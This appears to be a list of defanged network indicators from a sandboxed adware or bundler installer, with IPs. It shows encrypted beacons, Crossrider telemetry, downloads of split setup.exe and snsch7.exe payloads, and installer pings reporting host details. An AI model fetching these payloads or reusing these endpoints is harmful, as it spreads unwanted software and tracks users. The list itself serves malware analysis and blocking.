hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=N6dOqWm8Q97B 4EkIHdGP3TONeCOZhCdnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i4nJwzEzT2yGMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=aonlVHCKlbW/q1OYm6RuNmByKcxzlv585b37y9B2vIWAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJJl8f63dS692dskpjA9 6EJZxK5xGkdrnFAL52sIXt4VzrzFC04 gVxTj1NCBqzFNNh3QJEALW3S3BlOQDiqUVkeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=xY8ohDYpM gLjT49fHfOTNcxGaPWyPpOjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPo dgTcNa6NZpFhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YPTQLrSsAb MLus5Wbw9bkMfiZm 4OAHnaoKai08bVxwYEQnuvuDBXEJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGUE1ePzby02CzsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3AuytGSEdboIzGfiB 3gBuZcl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=uWabAt9SLcwnl2fxC/WcuzyMpz1Liwuq 16VblNcBpdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySaJkIKvOmtNBWOvghCBTr/TdVMo67fxO0s IILilpWF0vmoXMQKU1KjfsnOwcx38cDPVxwNO6aHCv3we1qTpKH8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=AZwPyJy3TZi4/9HrRpQ3bFoXilXt x7l68pZe0fGxSA2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmPxZZ7PW1hqwWMnNHFDGURnWsPQyEGmp3E4AKI//EGlK8qJaeUqNPyfIROPie2z407nXsJR6HRCLBPEhRyyBD7Dl617yh4HAWXhuXtiRNzc6pgJ7bW38x7N6a7p3zoCTj900rk/u2q4sYtQkadOxeGUQrm7qkQJ07VLGI2tGMAZkEHlpLL4kVIVZsO2IRUm0S3fTzht6ovY1YV lHKmkCemqn1dzsO21qFO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM=	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SiiQud1Q24EcqWLfaltpxWwAXYMT8ICd7 DRrDOGNmxc8Y9D7ZpfrCVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIaibNUAqLVJBBHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g==	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=hNMAVKhukry7P4fECSsJwloXilXt x7lK8Uk6qaOqbIicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3SkUvubeDU93VIs0AEv1kh1DKJj24mv8XjnS5StnPX94HWqnaKp4YBMTpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S9OHlqnpoaqAkC1fv30UfvKld0ylS1bImyBTYvJf3vjRbJ1qu5mi2nG/wC513n 0HRZRXx49nRJ1TcWL70UkzVrp4nRJFoUZgp4Yvmw1YuoPQOGdJX7Ys4OCi0N7aB6YG6hHY oh5wmy9pSoWtDn2v0LZyn40Iw2XriTPqtAWXps8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFawUbmkSx215x4j1VNOEsndx0FrV7x5rPXEmrfQGcHKRxmOFGE02dWYVMq3nYMuxdi r7NiSQEydOFU5mMfA2YwPKMRKx/Hy aYD1xi6d0GBG/fDcmPtyb/6CnTX MB8zBtIY2WtWIlXvh37zCULcAJjU0tqMnFrjE=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=A3ANzFv7fWAr54jemLLd4FoXilXt x7l6DyKvcFN9VsicvsFwQStENB87jgWTbK/3s5q cLFxyzJSKLVhW6rmW/5rCyD2Xgytgv4rmtJTtdjDTVY3IA3Sq2mie6K97bhs4164GCUCrHY6 CMJNDnNZ iO0G7IbrOitH7JkWOxZfyfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mKGC96/uInTgPCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovuk hMOF3swzZcIrLF/KDw30Dx2m 0F47aFzcNuM2tbw FqU0ZF4YO51d/yz32tmquaHkbuQuAqpFpXrulLecGSS4ZuIyp4CyD0lZpzINt8A	54.197.238.106
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/29451.ashx?e=Feo0TQZfu6JEiM3QAgk1iYgi1NSnhIRtw8nMATEIa68oHZkq4q5PhSAvELRpepitQR6/4IivvmRHTUVdycsO/aLYet4WaSQwgFOqBGDQz2QLLlTUMpAFH/UeuO5g99mU0JQd5HxgIXey8VQi2M4epHYd4Y83NAMoTrU4ENVj396PudgT/r4sDSnPrIouiGIKU/67/t1IJfRTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05A==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/16779.ashx?e=Feo0TQZfu6JEiM3QAgk1iYgi1NSnhIRtw8nMATEIa68oHZkq4q5PhSAvELRpepitQR6/4IivvmRHTUVdycsO/QVYgFN4nlXegFOqBGDQz2QLLlTUMpAFH/UeuO5g99mU0JQd5HxgIXey8VQi2M4epHYd4Y83NAMoTrU4ENVj396PudgT/r4sDSnPrIouiGIKU/67/t1IJfRTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05A==	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=M/g8cQcNP KIItTUp4SEbcPJzAExCGuv2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZsxEz6FfERdwJw4LO6ub5l5rBjqlmzKnb1Tx2y1fQnwbvamwkcEQSgOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOTzbANYrsS2gR3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHl0G73pRFkYRgncIi2chNT3eo /8EQQ7EaKr1l icJHo6jHoUXX2l omWJ/Ex9z3tzJVvURajp4qlUQ7Kz5asHZpCy29 Yy361S7rZnnZ2TU=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=Ka qOJkckoWKccrnLzDz3jyMpz1Liwuqg5GyWpM1 hSRoZJTpqsyZxASc9FSZWyorVov04UjcEgpkJMMnIn2/i1ccdUWYYSC0dynvbrq8d7wsHnwsxHHbdtgpjL3X7N9nl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSshtYpX C0wZa7n9ZpCSa7IeXQbvelEWRhJzI6WjgFlNrd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ==	54.197.238.106
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/22600.ashx?e=b1dRW7RxYKdJjQ9qCj/WvVoXilXt x7lm0bTQPH88bQ2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7/48CMVjnZqYdnXPxrWRGn2d/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22BkEWzuBPTEcJ0k C/6MtQnml2XdXjKhJm0LdlReY2/iE4Rn18L003uz0Lu2aZ4hDhQmP15je1GaTsjjJ8mc3T10pg6XDy/3LwNoUkQDviUHTEz4kyYc5/8KqZVqYWlwcAjHfcNnTKtbTyejejUzNC3Sr/B971errA9fO2Yg5guFF8alrqvW22iZlBAV/P QIa 2UJQ2VzF0N25JKCCCveTyBEepkkHbwkqC3cQqqaHCVSjIz3u7VGsuJbKr /YbypnDhgEfcwOQ UeIwETGMM8UMNmz6spbXupRrnThziN0QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA==	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZuBRen/2tOqQlo8H6qezB8RXqkSFNls Rah094EYGQaeEZDP9BIkAtrSutvT1yx4dwIunIXNkmXKy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXw8weuLV7sL008nm/3qTHBtVZMWj5VvxhAswSJxuoqNeoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=siwKo8d7dVSIItTUp4SEbQJu76sBMJpY2YTeaOaZJPFysSIQM/WMqhsgZm851Wm7Y4rWxtGruLEcdSxeBQrefTtdlsQvNjEsRp4Ckp mcZt7HEv67ptHclD/oBpUX5crnl1xOKDZuhX43G01TipW9rNM1MftkI9RcnDbXMoNEWZfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxQzFrZZ4espH98S7GEeR3AenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIQNLH6TecF 3BHIQSAUi/qZ6ui3jv/3sP3EbLWmTIe6HPSZuizlKZS4vVGidJQzQbwcX153juosly7z014jPGHi9SV3844bx1g==	54.197.238.106
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/2377.ashx?e=2fVCHF6kf8gQ0V45w4Sc0WByKcxzlv580m7i 9H0u1uAMRxV Cn6lnsc7hbJtTJHDHGXB7YFOPGAqkMremTu1UAw87IpRxOgd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22Hr5Jh 0vvS2sI9d zRUY660rXCKv72ck3a4leJj3gd30GxQkL QSvRXZhP8niUnuouQlrWxrEbh307rxaZ1a5R0XN4kzLp8byxoV5yxM aWz/mAL2f0kUvlxFm3ANXIVukv6L3jUTEetkfkXeiixz7VYzHpwFHNpOecXjUPxXOs63 4FUU7ahslKZixWyxYlhfMUt2wWrpAbmmceboMbQKhEXfc6iwiXOu Yv65 F7gLnsSLFHSKl92oOSCaAzXhNzKEv37udDSmkfVorzgpqzFQi2pphZpM0eXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=PcwT4QFtuPCnIVMsUgdaKeTSsuAiFgZ3EhGH33nPGlFA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZT4qEGVFBmbCNaC2D7gVLsXVWyif 2VH4gkOB3v7aTq0HF6v/LiU/bpEYybADOKl3RvzErPfRBsvzE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyG1ilf4LTBlruf1mkJJrsh5qUaB4LB4DB	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/22600.ashx?e=nTtqeiyyDwmIItTUp4SEbaUVMe4Pmy40KB2ZKuKuT4UgLxC0aXqYrUEev CIr75kR01FXcnLDv0ZUPCmmh6SS4BTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF3LiBTRxnKNddi1CRp07F4ZRCubuqRAnTtUsYja0YwBmQQeWksviRUhVmw7YhFSbRLHsuvK/uDTfHRTnuydNNUCo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/2377.ashx?e=Qoli4LW15gtnA3VLGqrT9TI/Pi8VB4hYaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxHiq/Ldpfbs/YBTqgRg0M9kCy5U1DKQBR/1HrjuYPfZlNCUHeR8YCF3LiBTRxnKNddi1CRp07F4ZRCubuqRAnTtUsYja0YwBmQQeWksviRUhVmw7YhFSbRLh8h5o3YrXrbLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw=	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=16&rnd=23400	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=23400	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=14220	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=14220	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=916	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=916	208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_d
hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&rnd=27944&v=1.0.8654.1177&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser=	107.20.238.80
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=17999	208.85.150.249
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=uWabAt9SLcwLjT49fHfOTNDx0QK0tujFjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPoz9GdXwkjcG2M0isR26F8c7K4ihqKSxe0jgb6v7cXpPt vCrCw4vHoxi6nXHFmzl4UJIhz0JUpzEfEpjPND7Tv589gkZhC35q9md5CSrcUCSh4vJSfGWeuF gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qxWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHqZLRunpF04Gnp31AH4wbxjJRF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA==	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=17999	208.85.150.249
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qwXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA==	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28949	208.85.150.249
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=LCnUzM5l8JJsK0lFUFVJ7zyMpz1Liwuq0mXIKGF6Fg9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySxfX6JWT60I15ewo25xH dugxP4Tpn7X9BPEhRyyBD7ADYwDanr6NLtqQCm9ETKWdXr6MSN5TWO9FMoEMJ/sprmNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA==	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28949	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=4703&rnd=8361	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5110&rnd=8361	208.85.150.249
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674
hxxp://ipgeoapi.com/	54.225.203.199
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681
